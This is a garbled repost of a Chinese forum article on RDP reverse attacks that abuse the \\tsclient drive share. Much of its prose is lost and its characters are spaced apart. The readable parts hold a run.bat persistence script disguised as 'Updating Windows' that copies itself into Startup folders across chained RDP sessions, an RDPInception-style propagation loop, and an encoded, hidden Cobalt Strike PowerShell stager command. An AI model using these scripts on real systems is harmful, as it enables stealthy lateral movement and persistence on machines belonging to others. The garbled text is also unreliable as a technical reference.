[18607] 2021-08-02_内网渗透|基于文件传输的RDP反向攻击

文档创建者:s7ckTeam
浏览次数:3
最后更新:2025-01-18
2021-08-02_内网渗透|基于文件传输的RDP反向攻击   R D P     W H O A M I   H A C K   2 0 2 1 - 0 8 - 0 2 #   , 1 2 #   , 2 0 #   , 3 i m a g e - 2 0 2 1 0 7 1 2 2 1 1 0 0 1 6 1 7   I T   使   V M   R D P     R D P     D M Z     3 3 8 9   使 使   R D P   R D P   姿 姿   R D P   W i n d o w s     m s t s c     S M B  
便 便 线   R D P I n c e p t i o n M s t s c   W i n d o w s     m s t s c . e x e   i m a g e - 2 0 2 1 0 7 1 2 2 1 1 0 0 1 6 1 7   m s t s c . e x e       便   t s c l i e n t  
i m a g e - 2 0 2 1 0 7 1 2 2 1 3 4 3 1 2 0 2 便 访 使   t s c l i e n t     C   d i r   t s c l i e n t c         #     C   c o p y   f i l e   t s c l i e n t c         #   #   t s c l i e n t
i m a g e - 2 0 2 1 0 7 1 2 2 1 3 9 2 2 8 6 8 使   t s c l i e n t     t e s t . t x t   i m a g e - 2 0 2 1 0 7 1 2 2 1 4 8 5 1 1 7 5 访 使   S M B     S M B   使   t s c l i e n t   访   t s c l i e n t 访   t s c l i e n t  
R D P   i m a g e - 2 0 2 1 0 7 1 3 1 0 3 0 4 9 3 3 1   W i n d o w s   S e r v e r   2 0 1 2   W i n d o w s   S e r v e r   2 0 1 2     3 3 8 9     W i n d o w s   1 0   使   W i n d o w s   S e r v e r   2 0 1 2     W i n d o w s   1 0     . b a t   r u n . b a t   r u n . b a t   s t a r t . b a t     t s c l i e n t     t s c l i e n t     t s c l i e n t     C o b a l t   S t r i k e     P o w e r S h e l l S t a g e r 使 线   r u n . b a t 使   r u n . b a t     W i n d o w s   S e r v e r   2 0 1 2   #   e c h o @ e c h o   o f f e c h o   U p d a t i n g   W i n d o w s   . . . #   e c h o @ e c h o   o f f #   t s c l i e n t t i m e o u t   1   > n u l   2 > & 1 #   访   t s c l i e n t ,     r u n . b a t     t s c l i e n t   c o p y   " C : P r o g r a m D a t a M i c r o s o f t W i n d o w s S t a r t   M e n u P r o g r a m s S t a r t U p r u n . b a t "   " t s c l i e n t C P r o g r a m D a t a M i c r o s o f t W i n d o w s S t a r t   M e n u P r o g r a m s S t a r t U p " #     C o b a l t   S t r i k e     P o w e r S h e l l   S t a g e r p o w e r s h e l l . e x e   - n o p   - w   h i d d e n   - e n c o d e d c o m m a n d   J A B z A D 0 A T g B l A H c A L Q B P A G I A a g B l A G M A d A A g A E k A T w A u A E 0 A Z Q B t A G 8 A c g B 5 A F M A d A B y A G U A Y Q B t A C g A L A B b A E M A b w B u A H Y A Z Q B y A H Q A X Q A 6 A D o A R g B y A G 8 A b Q B C A G E A c w B l A D Y A N A B T A H Q A c g B p A G 4 A Z w A o A C I A S A A 0 A H M A S Q B B A E E A Q Q B B A E E A Q Q B B A E E A Q Q B M A F Y A V w B h A D I A L w B p A F M A Q g B i A D k A b g B Q A H c A S w B m A D I A Z w B K A F U A Q g B N A F c A Y g B D A E Q A S g B q A E Y A b w
i m a g e - 2 0 2 1 0 7 1 3 0 0 2 2 3 7 2 2 0   W i n d o w s   S e r v e r   2 0 1 2     W i n d o w s   1 0     W i n d o w s   S e r v e r   2 0 1 2   W i n d o w s   S e r v e r   2 0 1 2     r u n . b a t   C : P r o g r a m D a t a M i c r o s o f t W i n d o w s S t a r t   M e n u P r o g r a m s S t a r t U p
i m a g e - 2 0 2 1 0 7 1 3 0 0 2 6 0 7 4 8 8   r u n . b a t     W i n d o w s   1 0   i m a g e - 2 0 2 1 0 7 1 3 0 1 1 3 2 8 7 7 4 r u n . b a t     P o w e r S h e l l   S t a g e r   W i n d o w s   1 0   线 i m a g e - 2 0 2 1 0 7 1 3 0 1 2 5 0 5 2 2 7
i m a g e - 2 0 2 1 0 7 1 3 0 1 2 4 0 8 0 0 6 R D P     W i n d o w s   S e r v e r   2 0 1 2     R D P     W i n d o w s   1 0   W i n d o w s   S e r v e r   2 0 1 2       r u n . b a t   i m a g e - 2 0 2 1 0 7 1 3 1 1 2 6 5 3 3 5 9 使   W i n d o w s   7     W i n d o w s   1 0 W i n d o w s   1 0     W i n d o w s   S e r v e r   2 0 1 2     W i n d o w s   1 0     W i n d o w s   S e r v e r   2 0 1 2   r u n . b a t   便   W i n d o w s   1 0     W i n d o w s   1 0 使   W i n d o w s   7     W i n d o w s   1 0     W i n d o w s   1 0     r u n . b a t   便
W i n d o w s   7   i m a g e - 2 0 2 1 0 7 1 3 1 1 1 7 3 5 7 4 4   W i n d o w s   7     W i n d o w s   7     r u n . b a t   便 W i n d o w s   7   便 线 i m a g e - 2 0 2 1 0 7 1 3 1 1 2 3 4 4 0 7 1   W i n d o w s   7  
  R D P     P O C A c t i v e B r e a c h     V i n c e n t   Y i u     P o C   h t t p s : / / g i t h u b . c o m / m d s e c a c t i v e b r e a c h / R D P I n c e p t i o n 使   R D P   访   A c t i v e B r e a c h     C     P C   X   R D P     C     B     B     A   A     P C   X   P C   X   R D P   t o   S e r v e r   A S e r v e r   A   R D P   t o   S e r v e r   B S e r v e r   B   R D P   t o   S e r v e r   C   R D P I n c e p t i o n     R D P I n c e p t i o n     R D P     R D P I n c e p t i o n     R D P   便 #   e c h o @ e c h o   o f f e c h o   U p d a t i n g   W i n d o w s   . . . #   e c h o @ e c h o   o f f #   t s c l i e n t t i m e o u t   1   > n u l   2 > & 1 #   R D P m k d i r   t s c l i e n t c t e m p   > n u l   2 > & 1 m k d i r   C : t e m p   > n u l   2 > & 1 #     r u n . b a t   c o p y   r u n . b a t   C : t e m p   > n u l   2 > & 1 c o p y   r u n . b a t   t s c l i e n t c t e m p   > n u l   2 > & 1 #   t x t d e l   / q   % T E M P % t e m p _ 0 0 . t x t   > n u l   2 > & 1 #     R D P   s e t   d i r s = d i r   / a : d   / b   / s   C : u s e r s * S t a r t u p * s e t   d i r s 2 = d i r   / a : d   / b   / s   t s c l i e n t c u s e r s * s t a r t u p * e c h o | % d i r s % | f i n d s t r   / i   " M i c r o s o f t W i n d o w s S t a r t   M e n u P r o g r a m s S t a r t u p " > > " % T E M P % t e m p _ 0 0 . t x t " e c h o | % d i r s 2 % | f i n d s t r   / i   " M i c r o s o f t W i n d o w s S t a r t   M e n u P r o g r a m s S t a r t u p " > > " % T E M P % t e m p _ 0 0 . t x t " #     r u n . b a t   f o r   / F   " t o k e n s = * "   % % a   i n   ( % T E M P % t e m p _ 0 0 . t x t )   D O   (         c o p y   r u n . b a t   " % % a "   > n u l   2 > & 1         c o p y   C : t e m p r u n . b a t   " % % a "   > n u l   2 > & 1         c o p y   t s c l i e n t c t e m p r u n . b a t   " % % a "   > n u l   2 > & 1 ) #   d e l   / q   % T E M P % t e m p _ 0 0 . t x t   > n u l   2 > & 1 #     C o b a l t   S t r i k e     P o w e r S h e l l   S t a g e r R E M   i f   " W I N D O M A I N " = " % U S E R D O M A I N % " (   p o w e r s h e l l . e x e   < c r a d l e   h e r e >   )
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则